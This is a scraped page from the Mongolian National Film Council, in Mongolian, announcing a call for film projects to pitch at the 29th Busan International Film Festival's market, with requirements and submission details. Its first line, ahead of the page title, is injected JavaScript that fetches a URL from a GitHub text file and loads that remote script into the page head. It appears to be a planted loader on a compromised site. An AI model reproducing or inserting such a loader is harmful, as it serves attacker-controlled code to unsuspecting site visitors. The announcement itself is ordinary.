;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); 29 ДАХЬ УДААГИЙН ПУСАНЫ ОЛОН УЛСЫН КИНО НААДАМД ТАНИЛЦУУЛАХ КИНО ТӨСӨЛ СОНГОН ШАЛГАРУУЛНА - Mongolian National Film Council

ПУСАНЫ ОЛОН УЛСЫН КИНО НААДАМД ТАНИЛЦУУЛАХ КИНО ТӨСӨЛ СОНГОН ШАЛГАРУУЛНА

29 ДАХЬ УДААГИЙН ПУСАНЫ ОЛОН УЛСЫН КИНО НААДАМД ТАНИЛЦУУЛАХ КИНО ТӨСӨЛ СОНГОН ШАЛГАРУУЛНА

29 ДАХЬ УДААГИЙН ПУСАНЫ ОЛОН УЛСЫН КИНО НААДАМД ТАНИЛЦУУЛАХ

КИНО ТӨСӨЛ СОНГОН ШАЛГАРУУЛНА

Бүгд Найрамдах Солонгос улсын Пусан хотноо жил бүр зохион байгуулагддаг Пусаны Олон улсын кино наадам нь 29 дахь удаагаа 2024 оны 10 дугаар сарын 02-11-ний өдрүүдэд зохион байгуулагдах гэж байна.

Энэхүү наадмын дэргэдэх “Asian Contents & Film Market” кино маркетын хүрээнд Кино урлагийн зөвлөлөөс “Mongolian Pitch Session in Busan” арга хэмжээг зохион байгуулахаар төлөвлөж байгаа юм. Тус арга хэмжээнд өөрийн төслөө танилцуулах хүсэлтэй, кино уран бүтээлийн төсөлтэй уран бүтээлчийг шалгаруулна.

Тавигдах шаардлага:

  1. Кино уран бүтээлийн төсөл нь олон улсын хамтарсан төсөл болон хэрэгжих боломжтой байх,
  2. Төсөл танилцуулах уран бүтээлч нь Англи хэлний ахисан түвшний мэдлэгтэй байх

Кино урлагийн зөвлөлөөс шалгарсан уран бүтээлчийн тус наадамд оролцох Пусаны кино наадмын дэргэдэх “Asian Contents & Film Market” кино маркетын мандат (market badge), 3 хоног байрлах байр, онгоцны зардлын 50 хувь болон арга хэмжээ зохион байгуулах үйл ажиллагааны зардлыг бүрэн хариуцна.

Дээрх шаардлагыг хангасан төсөлтэй уран бүтээлчид төслийн танилцуулга мэдээллээ доорх дарааллын дагуу бэлтгэн 2024 оны 08 дугаар сарын 05-ны дотор info@filmmongolia.gov.mn хаягаар ирүүлнэ үү.

Уран бүтээлчид төслийн танилцуулгаа дараах байдлаар Монгол болон Англи хэл дээр ирүүлнэ үү. Үүнд:

  • Төслийн нэр, төслийг хэрэгжүүлж буй байгууллага, хувь хүний нэр
  • Бүрэн хэмжээний уран сайхны кино байх ба төрөл харгалзахгүй
  • Логлайн (1-2 өгүүлбэр)
  • Синопсис буюу товч агуулга (1-2 нүүр)
  • Трийтмэнт (5 хүртэлх нүүр)
  • Уран бүтээлийн үйл явдлын байршил, он цаг хугацаа
  • Киноны өнгө төрх, зураглал, хийц, хэв маягийн дүрслэл (Reference moodboard)
  • Найруулагчийн товч танилцуулга, уран бүтээлийн жагсаалт
  • Найруулагчийн үзэл санаа (300 хүртэлх үг)
  • Продюсерын үзэл санаа (300 хүртэлх үг)

Төслийн танилцуулгад дээрх хэсгүүдийг заавал хавсаргасан байх ба нэмэлтээр дүрүүдийн тодорхойлолт, үйл явдлын зөрчил, гол дүрийн хөгжүүлэлт зэргээр баяжуулан төслийн танилцуулгаа илгээх боломжтой.

Дэлгэрэнгүй мэдээллийг 51-262226 дугаарын утаснаас холбогдон авна уу.